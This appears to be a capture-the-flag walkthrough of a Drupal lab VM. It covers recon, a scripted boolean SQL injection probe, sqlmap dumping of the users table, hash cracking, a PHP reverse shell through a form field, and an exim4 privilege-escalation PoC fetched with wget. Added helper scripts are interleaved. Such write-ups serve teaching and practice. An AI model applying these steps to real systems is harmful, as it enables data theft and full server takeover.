Not much preamble. Same routine as always: boot the VM, then run arp-scan -l to find the target host.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image.png)
192.168.75.141
Use nmap to gather more information (a SYN scan with -sS needs root; -p 1-65535 covers every TCP port):
nmap -sS -A -p 1-65535 192.168.75.141
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-1.png)
No surprise: ports 80 and 22 again.
Let's take a look at the web site.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-2-1024x405.png)
Drupal yet again...
Let's see whether anything on the page looks off.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-3.png)
Hmm? A numeric ID in the URL immediately brings SQL injection to mind.
It might actually be there.
Test it with an AND condition: nid=1 and 1=1 should render the same page as nid=1, while nid=1 and 1=2 should change it.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-4-1024x640.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-5-1024x547.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-6-1024x612.png)
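The AND test above, scripted so the comparison is not done by eye. This is an added example and not code from the original writeup; the target URL and the nid parameter are placeholders taken from the writeup, and the three-way comparison (baseline vs. a true condition vs. a false condition) is the logic a boolean-based probe relies on.

```shell
#!/bin/sh
# Added example (not part of the original writeup): a manual boolean-based
# SQL injection probe for a numeric GET parameter such as nid.
# Assumptions: curl is installed; URL and parameter name are placeholders.

# fetch_body URL PARAM VALUE OUTFILE
# -G turns --data-urlencode into a query string, so the space and '=' in
# the payload are encoded for us ("1 and 1=2" -> nid=1%20and%201%3D2).
fetch_body() {
    curl -sS -G --data-urlencode "$2=$3" -o "$4" "$1"
}

# bodies_differ FILE_A FILE_B -> 0 (true) when the two bodies differ
bodies_differ() {
    ! cmp -s "$1" "$2"
}

# verdict BASE_FILE TRUE_FILE FALSE_FILE
# Prints "injectable" when the TRUE condition leaves the page unchanged but
# the FALSE condition alters it; anything else is "inconclusive".
verdict() {
    if ! bodies_differ "$1" "$2" && bodies_differ "$1" "$3"; then
        echo injectable
    else
        echo inconclusive
    fi
}

# boolean_probe URL PARAM VALUE -> fetches the three variants and judges them
boolean_probe() {
    tmp=$(mktemp -d) || return 2
    fetch_body "$1" "$2" "$3"          "$tmp/base"  || return 2
    fetch_body "$1" "$2" "$3 and 1=1"  "$tmp/true"  || return 2
    fetch_body "$1" "$2" "$3 and 1=2"  "$tmp/false" || return 2
    result=$(verdict "$tmp/base" "$tmp/true" "$tmp/false")
    rm -rf "$tmp"
    echo "$2=$3: $result"
    [ "$result" = injectable ]
}

# usage (placeholder target from the writeup):
#   boolean_probe "http://192.168.75.141/" nid 1
```

If the page embeds something volatile (a CSRF token, a timestamp, a session-dependent menu), the baseline and the true-condition body will never be byte-identical; in that case strip the volatile parts with sed before comparing, or compare content lengths instead of the full body.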
There really does seem to be a problem; throw sqlmap at it and see.
sqlmap -u "http://192.168.75.141/?nid=1"
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-7-1024x978.png)
666, it really is injectable. Next, see whether the databases and tables can be enumerated.
sqlmap -u "http://192.168.75.141/?nid=1" --dbs
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-8-1024x597.png)
sqlmap -u "http://192.168.75.141/?nid=1" -D d7db --tables
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-9.png)
Dump the users table and see what it holds.
sqlmap -u "http://192.168.75.141/?nid=1" -D d7db -T users --dump
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-10-1024x452.png)
Two users, with hashed passwords (Drupal 7 stores $S$-prefixed hashes, which John recognises as the Drupal7 format).
Crack them with John...
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-11.png)
A directory scan with Yujian (御剑) turns up the robots.txt file.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-12.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-13.png)
It reveals the login page; log in with the john account and the cracked password.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-14-1024x435.png)
Some searching turns up a weakness: PHP code can be executed from the settings of the Contact Us form,
where a text field accepts PHP.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-15-1024x390.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-16-1024x330.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-17-1024x476.png)
Very much in the same spirit as the DC-7 box...
Try a reverse shell: start a listener on the attacking machine first, then save the PHP payload in that field. (Note: put some plain text in front of the PHP code, otherwise the code does not execute; the reason was not determined.)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-18-1024x618.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-19.png)
Shell obtained.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-20.png)
As expected, the familiar www-data privileges.
Look for files with the SUID bit (the s flag) set.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-21.png)
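The SUID hunt above, as an added example that is not part of the original writeup. The point is to filter out the setuid binaries that are supposed to be there so that an unusual one stands out; the baseline list is an assumption chosen for this example (typical Debian paths), not an authoritative allowlist.

```shell
#!/bin/sh
# Added example (not part of the original writeup): enumerate SUID/SGID
# files and suppress a baseline of expected ones.
# Assumption: the BASELINE paths are illustrative Debian defaults.

# list_setid ROOT -> regular files under ROOT with u+s (-perm -4000) or
# g+s (-perm -2000); permission-denied noise is discarded, output sorted
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Setuid programs that normally carry the bit on a Debian-style system.
BASELINE='
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/umount
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
'

# unusual_setid ROOT -> setid files under ROOT that are not in BASELINE
unusual_setid() {
    patterns=$(mktemp) || return 1
    printf '%s\n' "$BASELINE" | sed '/^$/d' > "$patterns"
    list_setid "$1" | grep -v -x -F -f "$patterns"
    status=$?
    rm -f "$patterns"
    return $status
}

# describe_setid ROOT -> owner, mode and path of each unusual entry, so a
# root-owned oddity such as a mail transfer agent is easy to spot
describe_setid() {
    unusual_setid "$1" | while IFS= read -r f; do
        ls -l "$f"
    done
}

# usage on the target:  describe_setid /
```

Once a candidate is found, the next step is exactly what the writeup does: query its version (for exim, exim4 --version or exim4 -bV) and look that version up against known local privilege escalation exploits before touching anything.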
The suspicious entry exim4 stands out.
Check its version.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-22.png)
A matching PoC was found.
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-23-1024x286.png)
Download the file marked in the red box to the target with wget, then
chmod +x it.
One snag: the script has Windows-style line endings, so every line ends in a carriage return (shown as ^M), and the shebang line then points at an interpreter that does not exist ("bad interpreter"). The ^M has to be removed from every line.
Method:
vi 46996.sh
:%s/^M//g
:wq
(In vi, the ^M in the search pattern must be entered by pressing Ctrl-V followed by Ctrl-M, not as the two characters ^ and M; in Vim, :set ff=unix before :wq does the same conversion.)
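The same cleanup without an editor, as an added example that is not part of the original writeup. It detects stray carriage returns, strips them in place while keeping the executable bit, and then checks that the interpreter named in the shebang actually resolves, which is the check that fails when a CR is glued to the path. The file name is a placeholder.

```shell
#!/bin/sh
# Added example (not part of the original writeup): detect and strip CRLF
# line endings from a downloaded script and verify its shebang.
# Assumption: the file name passed in is a placeholder such as 46996.sh.

# has_crlf FILE -> 0 (true) if the file contains any carriage return
has_crlf() {
    ! tr -d '\r' < "$1" | cmp -s - "$1"
}

# strip_crlf FILE -> remove every CR in place; writing back with cat
# keeps the file's permissions (including +x) and inode intact
strip_crlf() {
    tmp="$1.tmp.$$"
    tr -d '\r' < "$1" > "$tmp" || { rm -f "$tmp"; return 1; }
    cat "$tmp" > "$1"
    rm -f "$tmp"
}

# shebang_ok FILE -> 0 if the interpreter on line 1 exists and is executable.
# A trailing CR becomes part of the path ("/bin/bash\r"), so this fails on a
# CRLF file in the same way the kernel does ("bad interpreter").
shebang_ok() {
    interp=$(head -n 1 "$1" | sed 's/^#!//; s/ .*//')
    [ -n "$interp" ] && [ -x "$interp" ]
}

# fix_script FILE -> strip CRLF if present, then return the shebang check
fix_script() {
    if has_crlf "$1"; then
        strip_crlf "$1" || return 1
        echo "stripped carriage returns from $1"
    else
        echo "$1 already uses LF line endings"
    fi
    shebang_ok "$1"
}

# usage:  fix_script 46996.sh && ./46996.sh ...
```

Equivalent one-liners are sed -i 's/\r$//' 46996.sh (GNU sed) or dos2unix 46996.sh where it is installed; the function form above is just portable and verifiable.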
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-24.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-25.png)
![](http://objectstorage.global.loongapi.com/loongapiSources/picbed/olddata2/2020/05/image-26.png)